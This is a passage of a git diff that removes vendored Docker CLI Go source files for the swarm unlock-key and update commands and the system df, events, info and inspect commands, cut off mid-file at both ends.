-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/pkg/errors"
-	"golang.org/x/net/context"
-)
-
-func newUnlockKeyCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var rotate, quiet bool
-
-	cmd := &cobra.Command{
-		Use:   "unlock-key [OPTIONS]",
-		Short: "Manage the unlock key",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			client := dockerCli.Client()
-			ctx := context.Background()
-
-			if rotate {
-				flags := swarm.UpdateFlags{RotateManagerUnlockKey: true}
-
-				swarm, err := client.SwarmInspect(ctx)
-				if err != nil {
-					return err
-				}
-
-				if !swarm.Spec.EncryptionConfig.AutoLockManagers {
-					return errors.New("cannot rotate because autolock is not turned on")
-				}
-
-				err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags)
-				if err != nil {
-					return err
-				}
-				if !quiet {
-					fmt.Fprintf(dockerCli.Out(), "Successfully rotated manager unlock key.\n\n")
-				}
-			}
-
-			unlockKeyResp, err := client.SwarmGetUnlockKey(ctx)
-			if err != nil {
-				return errors.Wrap(err, "could not fetch unlock key")
-			}
-
-			if unlockKeyResp.UnlockKey == "" {
-				return errors.New("no unlock key is set")
-			}
-
-			if quiet {
-				fmt.Fprintln(dockerCli.Out(), unlockKeyResp.UnlockKey)
-			} else {
-				printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey)
-			}
-			return nil
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVar(&rotate, flagRotate, false, "Rotate unlock key")
-	flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token")
-
-	return cmd
-}
-
-func printUnlockCommand(ctx context.Context, dockerCli *command.DockerCli, unlockKey string) {
-	if len(unlockKey) == 0 {
-		return
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "To unlock a swarm manager after it restarts, run the `docker swarm unlock`\ncommand and provide the following key:\n\n    %s\n\nPlease remember to store this key in a password manager, since without it you\nwill not be able to restart the manager.\n", unlockKey)
-	return
-}
diff --git a/vendor/github.com/docker/docker/cli/command/swarm/update.go b/vendor/github.com/docker/docker/cli/command/swarm/update.go
deleted file mode 100644
index dbbd268725..0000000000
--- a/vendor/github.com/docker/docker/cli/command/swarm/update.go
+++ /dev/null
@@ -1,72 +0,0 @@
-package swarm
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/pkg/errors"
-	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
-)
-
-func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := swarmOptions{}
-
-	cmd := &cobra.Command{
-		Use:   "update [OPTIONS]",
-		Short: "Update the swarm",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runUpdate(dockerCli, cmd.Flags(), opts)
-		},
-		PreRunE: func(cmd *cobra.Command, args []string) error {
-			if cmd.Flags().NFlag() == 0 {
-				return pflag.ErrHelp
-			}
-			return nil
-		},
-	}
-
-	cmd.Flags().BoolVar(&opts.autolock, flagAutolock, false, "Change manager autolocking setting (true|false)")
-	addSwarmFlags(cmd.Flags(), &opts)
-	return cmd
-}
-
-func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts swarmOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	var updateFlags swarm.UpdateFlags
-
-	swarm, err := client.SwarmInspect(ctx)
-	if err != nil {
-		return err
-	}
-
-	prevAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers
-
-	opts.mergeSwarmSpec(&swarm.Spec, flags)
-
-	curAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers
-
-	err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, updateFlags)
-	if err != nil {
-		return err
-	}
-
-	fmt.Fprintln(dockerCli.Out(), "Swarm updated.")
-
-	if curAutoLock && !prevAutoLock {
-		unlockKeyResp, err := client.SwarmGetUnlockKey(ctx)
-		if err != nil {
-			return errors.Wrap(err, "could not fetch unlock key")
-		}
-		printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey)
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/system/cmd.go b/vendor/github.com/docker/docker/cli/command/system/cmd.go
deleted file mode 100644
index ab3beb895a..0000000000
--- a/vendor/github.com/docker/docker/cli/command/system/cmd.go
+++ /dev/null
@@ -1,26 +0,0 @@
-package system
-
-import (
-	"github.com/spf13/cobra"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-)
-
-// NewSystemCommand returns a cobra command for `system` subcommands
-func NewSystemCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "system",
-		Short: "Manage Docker",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-	}
-	cmd.AddCommand(
-		NewEventsCommand(dockerCli),
-		NewInfoCommand(dockerCli),
-		NewDiskUsageCommand(dockerCli),
-		NewPruneCommand(dockerCli),
-	)
-
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/system/df.go b/vendor/github.com/docker/docker/cli/command/system/df.go
deleted file mode 100644
index 9f712484aa..0000000000
--- a/vendor/github.com/docker/docker/cli/command/system/df.go
+++ /dev/null
@@ -1,56 +0,0 @@
-package system
-
-import (
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/formatter"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type diskUsageOptions struct {
-	verbose bool
-}
-
-// NewDiskUsageCommand creates a new cobra.Command for `docker df`
-func NewDiskUsageCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts diskUsageOptions
-
-	cmd := &cobra.Command{
-		Use:   "df [OPTIONS]",
-		Short: "Show docker disk usage",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runDiskUsage(dockerCli, opts)
-		},
-		Tags: map[string]string{"version": "1.25"},
-	}
-
-	flags := cmd.Flags()
-
-	flags.BoolVarP(&opts.verbose, "verbose", "v", false, "Show detailed information on space usage")
-
-	return cmd
-}
-
-func runDiskUsage(dockerCli *command.DockerCli, opts diskUsageOptions) error {
-	du, err := dockerCli.Client().DiskUsage(context.Background())
-	if err != nil {
-		return err
-	}
-
-	duCtx := formatter.DiskUsageContext{
-		Context: formatter.Context{
-			Output: dockerCli.Out(),
-		},
-		LayersSize: du.LayersSize,
-		Images:     du.Images,
-		Containers: du.Containers,
-		Volumes:    du.Volumes,
-		Verbose:    opts.verbose,
-	}
-
-	duCtx.Write()
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/system/events.go b/vendor/github.com/docker/docker/cli/command/system/events.go
deleted file mode 100644
index 087523051a..0000000000
--- a/vendor/github.com/docker/docker/cli/command/system/events.go
+++ /dev/null
@@ -1,140 +0,0 @@
-package system
-
-import (
-	"fmt"
-	"io"
-	"io/ioutil"
-	"sort"
-	"strings"
-	"text/template"
-	"time"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	eventtypes "github.com/docker/docker/api/types/events"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/jsonlog"
-	"github.com/docker/docker/utils/templates"
-	"github.com/spf13/cobra"
-)
-
-type eventsOptions struct {
-	since  string
-	until  string
-	filter opts.FilterOpt
-	format string
-}
-
-// NewEventsCommand creates a new cobra.Command for `docker events`
-func NewEventsCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := eventsOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:   "events [OPTIONS]",
-		Short: "Get real time events from the server",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runEvents(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVar(&opts.since, "since", "", "Show all events created since timestamp")
-	flags.StringVar(&opts.until, "until", "", "Stream events until this timestamp")
-	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
-	flags.StringVar(&opts.format, "format", "", "Format the output using the given Go template")
-
-	return cmd
-}
-
-func runEvents(dockerCli *command.DockerCli, opts *eventsOptions) error {
-	tmpl, err := makeTemplate(opts.format)
-	if err != nil {
-		return cli.StatusError{
-			StatusCode: 64,
-			Status:     "Error parsing format: " + err.Error()}
-	}
-	options := types.EventsOptions{
-		Since:   opts.since,
-		Until:   opts.until,
-		Filters: opts.filter.Value(),
-	}
-
-	ctx, cancel := context.WithCancel(context.Background())
-	events, errs := dockerCli.Client().Events(ctx, options)
-	defer cancel()
-
-	out := dockerCli.Out()
-
-	for {
-		select {
-		case event := <-events:
-			if err := handleEvent(out, event, tmpl); err != nil {
-				return err
-			}
-		case err := <-errs:
-			if err == io.EOF {
-				return nil
-			}
-			return err
-		}
-	}
-}
-
-func handleEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error {
-	if tmpl == nil {
-		return prettyPrintEvent(out, event)
-	}
-
-	return formatEvent(out, event, tmpl)
-}
-
-func makeTemplate(format string) (*template.Template, error) {
-	if format == "" {
-		return nil, nil
-	}
-	tmpl, err := templates.Parse(format)
-	if err != nil {
-		return tmpl, err
-	}
-	// we execute the template for an empty message, so as to validate
-	// a bad template like "{{.badFieldString}}"
-	return tmpl, tmpl.Execute(ioutil.Discard, &eventtypes.Message{})
-}
-
-// prettyPrintEvent prints all types of event information.
-// Each output includes the event type, actor id, name and action.
-// Actor attributes are printed at the end if the actor has any.
-func prettyPrintEvent(out io.Writer, event eventtypes.Message) error {
-	if event.TimeNano != 0 {
-		fmt.Fprintf(out, "%s ", time.Unix(0, event.TimeNano).Format(jsonlog.RFC3339NanoFixed))
-	} else if event.Time != 0 {
-		fmt.Fprintf(out, "%s ", time.Unix(event.Time, 0).Format(jsonlog.RFC3339NanoFixed))
-	}
-
-	fmt.Fprintf(out, "%s %s %s", event.Type, event.Action, event.Actor.ID)
-
-	if len(event.Actor.Attributes) > 0 {
-		var attrs []string
-		var keys []string
-		for k := range event.Actor.Attributes {
-			keys = append(keys, k)
-		}
-		sort.Strings(keys)
-		for _, k := range keys {
-			v := event.Actor.Attributes[k]
-			attrs = append(attrs, fmt.Sprintf("%s=%s", k, v))
-		}
-		fmt.Fprintf(out, " (%s)", strings.Join(attrs, ", "))
-	}
-	fmt.Fprint(out, "\n")
-	return nil
-}
-
-func formatEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error {
-	defer out.Write([]byte{'\n'})
-	return tmpl.Execute(out, event)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/system/info.go b/vendor/github.com/docker/docker/cli/command/system/info.go
deleted file mode 100644
index e0b8767377..0000000000
--- a/vendor/github.com/docker/docker/cli/command/system/info.go
+++ /dev/null
@@ -1,334 +0,0 @@
-package system
-
-import (
-	"fmt"
-	"sort"
-	"strings"
-	"time"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/utils"
-	"github.com/docker/docker/utils/templates"
-	"github.com/docker/go-units"
-	"github.com/spf13/cobra"
-)
-
-type infoOptions struct {
-	format string
-}
-
-// NewInfoCommand creates a new cobra.Command for `docker info`
-func NewInfoCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts infoOptions
-
-	cmd := &cobra.Command{
-		Use:   "info [OPTIONS]",
-		Short: "Display system-wide information",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runInfo(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-
-	return cmd
-}
-
-func runInfo(dockerCli *command.DockerCli, opts *infoOptions) error {
-	ctx := context.Background()
-	info, err := dockerCli.Client().Info(ctx)
-	if err != nil {
-		return err
-	}
-	if opts.format == "" {
-		return prettyPrintInfo(dockerCli, info)
-	}
-	return formatInfo(dockerCli, info, opts.format)
-}
-
-func prettyPrintInfo(dockerCli *command.DockerCli, info types.Info) error {
-	fmt.Fprintf(dockerCli.Out(), "Containers: %d\n", info.Containers)
-	fmt.Fprintf(dockerCli.Out(), " Running: %d\n", info.ContainersRunning)
-	fmt.Fprintf(dockerCli.Out(), " Paused: %d\n", info.ContainersPaused)
-	fmt.Fprintf(dockerCli.Out(), " Stopped: %d\n", info.ContainersStopped)
-	fmt.Fprintf(dockerCli.Out(), "Images: %d\n", info.Images)
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Server Version: %s\n", info.ServerVersion)
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Storage Driver: %s\n", info.Driver)
-	if info.DriverStatus != nil {
-		for _, pair := range info.DriverStatus {
-			fmt.Fprintf(dockerCli.Out(), " %s: %s\n", pair[0], pair[1])
-
-			// print a warning if devicemapper is using a loopback file
-			if pair[0] == "Data loop file" {
-				fmt.Fprintln(dockerCli.Err(), " WARNING: Usage of loopback devices is strongly discouraged for production use. Use `--storage-opt dm.thinpooldev` to specify a custom block storage device.")
-			}
-		}
-
-	}
-	if info.SystemStatus != nil {
-		for _, pair := range info.SystemStatus {
-			fmt.Fprintf(dockerCli.Out(), "%s: %s\n", pair[0], pair[1])
-		}
-	}
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Logging Driver: %s\n", info.LoggingDriver)
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Cgroup Driver: %s\n", info.CgroupDriver)
-
-	fmt.Fprintf(dockerCli.Out(), "Plugins: \n")
-	fmt.Fprintf(dockerCli.Out(), " Volume:")
-	fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Volume, " "))
-	fmt.Fprintf(dockerCli.Out(), "\n")
-	fmt.Fprintf(dockerCli.Out(), " Network:")
-	fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Network, " "))
-	fmt.Fprintf(dockerCli.Out(), "\n")
-
-	if len(info.Plugins.Authorization) != 0 {
-		fmt.Fprintf(dockerCli.Out(), " Authorization:")
-		fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Authorization, " "))
-		fmt.Fprintf(dockerCli.Out(), "\n")
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "Swarm: %v\n", info.Swarm.LocalNodeState)
-	if info.Swarm.LocalNodeState != swarm.LocalNodeStateInactive && info.Swarm.LocalNodeState != swarm.LocalNodeStateLocked {
-		fmt.Fprintf(dockerCli.Out(), " NodeID: %s\n", info.Swarm.NodeID)
-		if info.Swarm.Error != "" {
-			fmt.Fprintf(dockerCli.Out(), " Error: %v\n", info.Swarm.Error)
-		}
-		fmt.Fprintf(dockerCli.Out(), " Is Manager: %v\n", info.Swarm.ControlAvailable)
-		if info.Swarm.ControlAvailable {
-			fmt.Fprintf(dockerCli.Out(), " ClusterID: %s\n", info.Swarm.Cluster.ID)
-			fmt.Fprintf(dockerCli.Out(), " Managers: %d\n", info.Swarm.Managers)
-			fmt.Fprintf(dockerCli.Out(), " Nodes: %d\n", info.Swarm.Nodes)
-			fmt.Fprintf(dockerCli.Out(), " Orchestration:\n")
-			taskHistoryRetentionLimit := int64(0)
-			if info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit != nil {
-				taskHistoryRetentionLimit = *info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit
-			}
-			fmt.Fprintf(dockerCli.Out(), "  Task History Retention Limit: %d\n", taskHistoryRetentionLimit)
-			fmt.Fprintf(dockerCli.Out(), " Raft:\n")
-			fmt.Fprintf(dockerCli.Out(), "  Snapshot Interval: %d\n", info.Swarm.Cluster.Spec.Raft.SnapshotInterval)
-			if info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots != nil {
-				fmt.Fprintf(dockerCli.Out(), "  Number of Old Snapshots to Retain: %d\n", *info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots)
-			}
-			fmt.Fprintf(dockerCli.Out(), "  Heartbeat Tick: %d\n", info.Swarm.Cluster.Spec.Raft.HeartbeatTick)
-			fmt.Fprintf(dockerCli.Out(), "  Election Tick: %d\n", info.Swarm.Cluster.Spec.Raft.ElectionTick)
-			fmt.Fprintf(dockerCli.Out(), " Dispatcher:\n")
-			fmt.Fprintf(dockerCli.Out(), "  Heartbeat Period: %s\n", units.HumanDuration(time.Duration(info.Swarm.Cluster.Spec.Dispatcher.HeartbeatPeriod)))
-			fmt.Fprintf(dockerCli.Out(), " CA Configuration:\n")
-			fmt.Fprintf(dockerCli.Out(), "  Expiry Duration: %s\n", units.HumanDuration(info.Swarm.Cluster.Spec.CAConfig.NodeCertExpiry))
-			if len(info.Swarm.Cluster.Spec.CAConfig.ExternalCAs) > 0 {
-				fmt.Fprintf(dockerCli.Out(), "  External CAs:\n")
-				for _, entry := range info.Swarm.Cluster.Spec.CAConfig.ExternalCAs {
-					fmt.Fprintf(dockerCli.Out(), "    %s: %s\n", entry.Protocol, entry.URL)
-				}
-			}
-		}
-		fmt.Fprintf(dockerCli.Out(), " Node Address: %s\n", info.Swarm.NodeAddr)
-		managers := []string{}
-		for _, entry := range info.Swarm.RemoteManagers {
-			managers = append(managers, entry.Addr)
-		}
-		if len(managers) > 0 {
-			sort.Strings(managers)
-			fmt.Fprintf(dockerCli.Out(), " Manager Addresses:\n")
-			for _, entry := range managers {
-				fmt.Fprintf(dockerCli.Out(), "  %s\n", entry)
-			}
-		}
-	}
-
-	if len(info.Runtimes) > 0 {
-		fmt.Fprintf(dockerCli.Out(), "Runtimes:")
-		for name := range info.Runtimes {
-			fmt.Fprintf(dockerCli.Out(), " %s", name)
-		}
-		fmt.Fprint(dockerCli.Out(), "\n")
-		fmt.Fprintf(dockerCli.Out(), "Default Runtime: %s\n", info.DefaultRuntime)
-	}
-
-	if info.OSType == "linux" {
-		fmt.Fprintf(dockerCli.Out(), "Init Binary: %v\n", info.InitBinary)
-
-		for _, ci := range []struct {
-			Name   string
-			Commit types.Commit
-		}{
-			{"containerd", info.ContainerdCommit},
-			{"runc", info.RuncCommit},
-			{"init", info.InitCommit},
-		} {
-			fmt.Fprintf(dockerCli.Out(), "%s version: %s", ci.Name, ci.Commit.ID)
-			if ci.Commit.ID != ci.Commit.Expected {
-				fmt.Fprintf(dockerCli.Out(), " (expected: %s)", ci.Commit.Expected)
-			}
-			fmt.Fprintf(dockerCli.Out(), "\n")
-		}
-		if len(info.SecurityOptions) != 0 {
-			kvs, err := types.DecodeSecurityOptions(info.SecurityOptions)
-			if err != nil {
-				return err
-			}
-			fmt.Fprintf(dockerCli.Out(), "Security Options:\n")
-			for _, so := range kvs {
-				fmt.Fprintf(dockerCli.Out(), " %s\n", so.Name)
-				for _, o := range so.Options {
-					switch o.Key {
-					case "profile":
-						if o.Value != "default" {
-							fmt.Fprintf(dockerCli.Err(), "  WARNING: You're not using the default seccomp profile\n")
-						}
-						fmt.Fprintf(dockerCli.Out(), "  Profile: %s\n", o.Value)
-					}
-				}
-			}
-		}
-	}
-
-	// Isolation only has meaning on a Windows daemon.
-	if info.OSType == "windows" {
-		fmt.Fprintf(dockerCli.Out(), "Default Isolation: %v\n", info.Isolation)
-	}
-
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Kernel Version: %s\n", info.KernelVersion)
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Operating System: %s\n", info.OperatingSystem)
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "OSType: %s\n", info.OSType)
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Architecture: %s\n", info.Architecture)
-	fmt.Fprintf(dockerCli.Out(), "CPUs: %d\n", info.NCPU)
-	fmt.Fprintf(dockerCli.Out(), "Total Memory: %s\n", units.BytesSize(float64(info.MemTotal)))
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Name: %s\n", info.Name)
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "ID: %s\n", info.ID)
-	fmt.Fprintf(dockerCli.Out(), "Docker Root Dir: %s\n", info.DockerRootDir)
-	fmt.Fprintf(dockerCli.Out(), "Debug Mode (client): %v\n", utils.IsDebugEnabled())
-	fmt.Fprintf(dockerCli.Out(), "Debug Mode (server): %v\n", info.Debug)
-
-	if info.Debug {
-		fmt.Fprintf(dockerCli.Out(), " File Descriptors: %d\n", info.NFd)
-		fmt.Fprintf(dockerCli.Out(), " Goroutines: %d\n", info.NGoroutines)
-		fmt.Fprintf(dockerCli.Out(), " System Time: %s\n", info.SystemTime)
-		fmt.Fprintf(dockerCli.Out(), " EventsListeners: %d\n", info.NEventsListener)
-	}
-
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Http Proxy: %s\n", info.HTTPProxy)
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Https Proxy: %s\n", info.HTTPSProxy)
-	ioutils.FprintfIfNotEmpty(dockerCli.Out(), "No Proxy: %s\n", info.NoProxy)
-
-	if info.IndexServerAddress != "" {
-		u := dockerCli.ConfigFile().AuthConfigs[info.IndexServerAddress].Username
-		if len(u) > 0 {
-			fmt.Fprintf(dockerCli.Out(), "Username: %v\n", u)
-		}
-		fmt.Fprintf(dockerCli.Out(), "Registry: %v\n", info.IndexServerAddress)
-	}
-
-	// Only output these warnings if the server does not support these features
-	if info.OSType != "windows" {
-		if !info.MemoryLimit {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: No memory limit support")
-		}
-		if !info.SwapLimit {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: No swap limit support")
-		}
-		if !info.KernelMemory {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: No kernel memory limit support")
-		}
-		if !info.OomKillDisable {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: No oom kill disable support")
-		}
-		if !info.CPUCfsQuota {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs quota support")
-		}
-		if !info.CPUCfsPeriod {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs period support")
-		}
-		if !info.CPUShares {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu shares support")
-		}
-		if !info.CPUSet {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: No cpuset support")
-		}
-		if !info.IPv4Forwarding {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: IPv4 forwarding is disabled")
-		}
-		if !info.BridgeNfIptables {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-iptables is disabled")
-		}
-		if !info.BridgeNfIP6tables {
-			fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-ip6tables is disabled")
-		}
-	}
-
-	if info.Labels != nil {
-		fmt.Fprintln(dockerCli.Out(), "Labels:")
-		for _, attribute := range info.Labels {
-			fmt.Fprintf(dockerCli.Out(), " %s\n", attribute)
-		}
-		// TODO: Engine labels with duplicate keys has been deprecated in 1.13 and will be error out
-		// after 3 release cycles (1.16). For now, a WARNING will be generated. The following will
-		// be removed eventually.
-		labelMap := map[string]string{}
-		for _, label := range info.Labels {
-			stringSlice := strings.SplitN(label, "=", 2)
-			if len(stringSlice) > 1 {
-				// If there is a conflict we will throw out an warning
-				if v, ok := labelMap[stringSlice[0]]; ok && v != stringSlice[1] {
-					fmt.Fprintln(dockerCli.Err(), "WARNING: labels with duplicate keys and conflicting values have been deprecated")
-					break
-				}
-				labelMap[stringSlice[0]] = stringSlice[1]
-			}
-		}
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "Experimental: %v\n", info.ExperimentalBuild)
-	if info.ClusterStore != "" {
-		fmt.Fprintf(dockerCli.Out(), "Cluster Store: %s\n", info.ClusterStore)
-	}
-
-	if info.ClusterAdvertise != "" {
-		fmt.Fprintf(dockerCli.Out(), "Cluster Advertise: %s\n", info.ClusterAdvertise)
-	}
-
-	if info.RegistryConfig != nil && (len(info.RegistryConfig.InsecureRegistryCIDRs) > 0 || len(info.RegistryConfig.IndexConfigs) > 0) {
-		fmt.Fprintln(dockerCli.Out(), "Insecure Registries:")
-		for _, registry := range info.RegistryConfig.IndexConfigs {
-			if registry.Secure == false {
-				fmt.Fprintf(dockerCli.Out(), " %s\n", registry.Name)
-			}
-		}
-
-		for _, registry := range info.RegistryConfig.InsecureRegistryCIDRs {
-			mask, _ := registry.Mask.Size()
-			fmt.Fprintf(dockerCli.Out(), " %s/%d\n", registry.IP.String(), mask)
-		}
-	}
-
-	if info.RegistryConfig != nil && len(info.RegistryConfig.Mirrors) > 0 {
-		fmt.Fprintln(dockerCli.Out(), "Registry Mirrors:")
-		for _, mirror := range info.RegistryConfig.Mirrors {
-			fmt.Fprintf(dockerCli.Out(), " %s\n", mirror)
-		}
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "Live Restore Enabled: %v\n", info.LiveRestoreEnabled)
-
-	return nil
-}
-
-func formatInfo(dockerCli *command.DockerCli, info types.Info, format string) error {
-	tmpl, err := templates.Parse(format)
-	if err != nil {
-		return cli.StatusError{StatusCode: 64,
-			Status: "Template parsing error: " + err.Error()}
-	}
-	err = tmpl.Execute(dockerCli.Out(), info)
-	dockerCli.Out().Write([]byte{'\n'})
-	return err
-}
diff --git a/vendor/github.com/docker/docker/cli/command/system/inspect.go b/vendor/github.com/docker/docker/cli/command/system/inspect.go
deleted file mode 100644
index c86e858a29..0000000000
--- a/vendor/github.com/docker/docker/cli/command/system/inspect.go
+++ /dev/null
@@ -1,203 +0,0 @@
-package system
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/inspect"
-	apiclient "github.com/docker/docker/client"
-	"github.com/spf13/cobra"
-)
-
-type inspectOptions struct {
-	format      string
-	inspectType string
-	size        bool
-	ids         []string
-}
-
-// NewInspectCommand creates a new cobra.Command for `docker inspect`
-func NewInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts inspectOptions
-
-	cmd := &cobra.Command{
-		Use:   "inspect [OPTIONS] NAME|ID [NAME|ID...]",
-		Short: "Return low-level information on Docker objects",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.ids = args
-			return runInspect(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-	flags.StringVar(&opts.inspectType, "type", "", "Return JSON for specified type")
-	flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes if the type is container")
-
-	return cmd
-}
-
-func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
-	var elementSearcher inspect.GetRefFunc
-	switch opts.inspectType {
-	case "", "container", "image", "node", "network", "service", "volume", "task", "plugin":
-		elementSearcher = inspectAll(context.Background(), dockerCli, opts.size, opts.inspectType)
-	default:
-		return fmt.Errorf("%q is not a valid value for --type", opts.inspectType)
-	}
-	return inspect.Inspect(dockerCli.Out(), opts.ids, opts.format, elementSearcher)
-}
-
-func inspectContainers(ctx context.Context, dockerCli *command.DockerCli, getSize bool) inspect.GetRefFunc {
-	return func(ref string) (interface{}, []byte, error) {
-		return dockerCli.Client().ContainerInspectWithRaw(ctx, ref, getSize)
-	}
-}
-
-func inspectImages(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
-	return func(ref string) (interface{}, []byte, error) {
-		return dockerCli.Client().ImageInspectWithRaw(ctx, ref)
-	}
-}
-
-func inspectNetwork(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
-	return func(ref string) (interface{}, []byte, error) {
-		return dockerCli.Client().NetworkInspectWithRaw(ctx, ref)
-	}
-}
-
-func inspectNode(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
-	return func(ref string) (interface{}, []byte, error) {
-		return dockerCli.Client().NodeInspectWithRaw(ctx, ref)
-	}
-}
-
-func inspectService(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
-	return func(ref string) (interface{}, []byte, error) {
-		return dockerCli.Client().ServiceInspectWithRaw(ctx, ref)
-	}
-}
-
-func inspectTasks(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
-	return func(ref string) (interface{}, []byte, error) {
-		return dockerCli.Client().TaskInspectWithRaw(ctx, ref)
-	}
-}
-
-func inspectVolume(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
-	return func(ref string) (interface{}, []byte, error) {
-		return dockerCli.Client().VolumeInspectWithRaw(ctx, ref)
-	}
-}
-
-func inspectPlugin(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc {
-	return func(ref string) (interface{}, []byte, error) {
-		return dockerCli.Client().PluginInspectWithRaw(ctx, ref)
-	}
-}
-
-func inspectAll(ctx context.Context, dockerCli *command.DockerCli, getSize bool, typeConstraint string) inspect.GetRefFunc {
-	var inspectAutodetect = []struct {
-		objectType      string
-		isSizeSupported bool
-		isSwarmObject   bool
-		objectInspector func(string) (interface{}, []byte, error)
-	}{
-		{
-			objectType:      "container",
-			isSizeSupported: true,
-			objectInspector: inspectContainers(ctx, dockerCli, getSize),
-		},
-		{
-			objectType:      "image",
-			objectInspector: inspectImages(ctx, dockerCli),
-		},
-		{
-			objectType:      "network",
-			objectInspector: inspectNetwork(ctx, dockerCli),
-		},
-		{
-			objectType:      "volume",
-			objectInspector: inspectVolume(ctx, dockerCli),
